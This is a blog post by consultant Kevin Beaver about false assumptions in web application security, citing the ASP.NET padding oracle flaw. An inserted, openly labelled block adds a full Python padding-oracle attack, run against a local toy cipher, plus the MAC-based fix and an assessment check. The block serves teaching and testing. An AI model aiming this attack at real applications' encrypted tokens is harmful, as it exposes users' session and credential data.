Don’t get caught off guard. We hear that statement all the time with regard to information security. Sadly, as many businesses have experienced, such talk is cheap. Obviously no one wants their Web site to get hacked. Okay, maybe a few admins or developers who are dying to find a way to get the funding and support they need to do application security right wouldn’t mind. But these folks are the exception.

So what does it really mean to not get caught off guard in the context of application security? It’s more complicated than most assume. There are much bigger forces at work here than a firewall, SSL, and a trusted website seal. One of the things that really stands out to me is that the right people are not all on the same page. Quite often management doesn’t really understand what’s at risk. Nor do they understand the process, the expertise and the attention to detail that must go into application security testing. You also have managers who fear that numerous security flaws will be uncovered and that unjustified controls will then end up getting in the way of doing business. I know I’ve ranted about this stuff before but I truly believe it’s the source of many of the problems we face.

Those in management are not the only group of people with their heads in the sand, though. There’s compliance, internal audit, marketing, customer service, operations and so on – all of whom often have their hands in a typical business’s Web presence yet are completely disconnected from the risks associated with what they manage. I’m not saying everyone is this way. However, many people in these roles are extremely naive when it comes to true application security. They’ll often perform their self-assessment checklist audit, run a basic vulnerability scan, or assume someone else (IT) is taking care of the matter. That’s not always the case. People in IT often have their hands full and aren’t taking the appropriate steps to ensure Web security either. It’s not necessarily a lack of caring but rather a case of “I can’t keep up”, “We’ll get to it eventually”, or “No one has ever asked us about it”.

There’s also a common assumption that all users of Web applications can be trusted. Maybe so. It’s all the other hooligans of the world who are trying their hardest to gain the credentials of “trusted” users, perform direct hacks or even spread malware via your systems. Likewise, many assume that Web security compromises will be highly visible so the appropriate people can react accordingly. That’s not always the case. Recently I’ve seen several situations up close in which Web application and security administrators had no clue their applications were being exploited until it was too late – way too late.

Finally, there’s the assumption that if nothing turns up in Web vulnerability scans and manual analysis, everything’s safe and secure. Things may seem clean and clear but you absolutely cannot rely on that. Case in point: the recent padding oracle exploit on ASP.NET-based systems. I was working on a project where we didn’t uncover the exploit using a basic scan policy yet found it when using a full scan policy. Another scanner used didn’t find the flaw at all. Imagine trying to explain such an oversight once your Web server is completely compromised.
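To make the padding oracle concrete, here is an added example; it is not code from the original post and not Kevin Beaver’s. The ASP.NET issue the post refers to (Microsoft’s MS10-070, disclosed in 2010) leaked exactly one bit per request, namely whether a tampered ciphertext decrypted to valid padding, and that bit is enough to decrypt any CBC-encrypted blob the application hands out. The block below simulates that in one process: a toy four-round Feistel cipher built from HMAC-SHA256 stands in for AES (the attack never depends on which block cipher is under CBC), the key and the plaintext are constructed for the demo, and `padding_oracle` plays the role of the HTTP endpoint whose 200/500 behaviour gives the answer away. The attacker side, `padding_oracle_attack`, sees only the token and the yes/no answers. Why a scanner misses this is visible in the query count: recovering one 16-byte block needs up to 256 requests per byte, all of which look like ordinary requests with a garbage cookie, so a tool that sends a handful of probes or does not recognise the two error responses as distinguishable reports nothing.

```python
import hashlib
import hmac
import os

BLOCK = 16
# Constructed demo key. Only the server-side helpers below ever read it.
KEY = b"constructed-demo-key-not-a-secret"


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    # Toy round function: HMAC-SHA256 of the half-block, truncated to 8 bytes.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    # Four-round Feistel permutation over 16-byte blocks. Stand-in for AES so the
    # example runs with the standard library only; it is NOT a secure cipher.
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, xor(l, _f(key, r, i))
    return l + r


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _f(key, l, i)), l
    return l + r


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = toy_encrypt_block(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out += xor(toy_decrypt_block(key, blk), prev)
        prev = blk
    return out


def encrypt_token(plaintext: bytes) -> bytes:
    """Server side: IV || CBC ciphertext, the opaque blob an app puts in a cookie."""
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(KEY, iv, pkcs7_pad(plaintext))


def padding_oracle(token: bytes) -> bool:
    """Server side. All it reveals is whether the padding was valid (think 200
    versus 500, or two different error pages). That one bit is the whole flaw."""
    try:
        pkcs7_unpad(cbc_decrypt(KEY, token[:BLOCK], token[BLOCK:]))
        return True
    except ValueError:
        return False


def padding_oracle_attack(oracle, token: bytes) -> bytes:
    """Attacker side: recovers the plaintext from the token and yes/no answers
    only. Never reads KEY."""
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    recovered = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_k(target), learned one byte at a time, right to left
        for pos in range(BLOCK - 1, -1, -1):
            pad_val = BLOCK - pos
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):  # known bytes: force them to decrypt to pad_val
                forged[j] = inter[j] ^ pad_val
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + target):
                    continue
                if pos == BLOCK - 1:
                    # Edge case: "valid" for the last byte may mean \x02\x02 (or
                    # longer) rather than \x01. Disturb the byte to the left; only
                    # a genuine \x01 padding stays valid.
                    probe = bytearray(forged)
                    probe[pos - 1] ^= 0xFF
                    if not oracle(bytes(probe) + target):
                        continue
                inter[pos] = guess ^ pad_val
                break
            else:
                raise RuntimeError("oracle never accepted any padding")
        recovered += xor(bytes(inter), prev)  # P = D_k(C_i) XOR C_(i-1)
    return pkcs7_unpad(recovered)


def recover_with_count(token: bytes):
    """Runs the attack and reports how many oracle queries it took."""
    queries = 0

    def counting_oracle(t: bytes) -> bool:
        nonlocal queries
        queries += 1
        return padding_oracle(t)

    return padding_oracle_attack(counting_oracle, token), queries


if __name__ == "__main__":
    tok = encrypt_token(b"user=alice;role=admin")  # constructed demo plaintext
    pt, n = recover_with_count(tok)
    print(pt, "recovered after", n, "oracle queries")
```

The fix on the server is not a better error page: it is a MAC over IV and ciphertext, verified in constant time before any decryption is attempted, so a tampered token is rejected the same way regardless of what it would have decrypted to. If you are assessing an application, the check is to take any encrypted value it issues, flip the last byte of the next-to-last block a few hundred times, and see whether the responses fall into two distinguishable classes; if they do, this code is what the attacker runs next.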

My point is: never, ever assume anything; such an approach will only serve to bite you when you’re least expecting it. So know the facts, be proactive, and know that there’s always room for improvement.

Kevin Beaver

Kevin Beaver, CISSP is an independent information security consultant, writer, and professional speaker with Atlanta, GA-based Principle Logic, LLC. With over 32 years in IT and 26 years in security, Kevin specializes in vulnerability and penetration testing, security program reviews, and virtual CISO consulting work to help businesses uncheck the boxes that keep creating a false sense of security.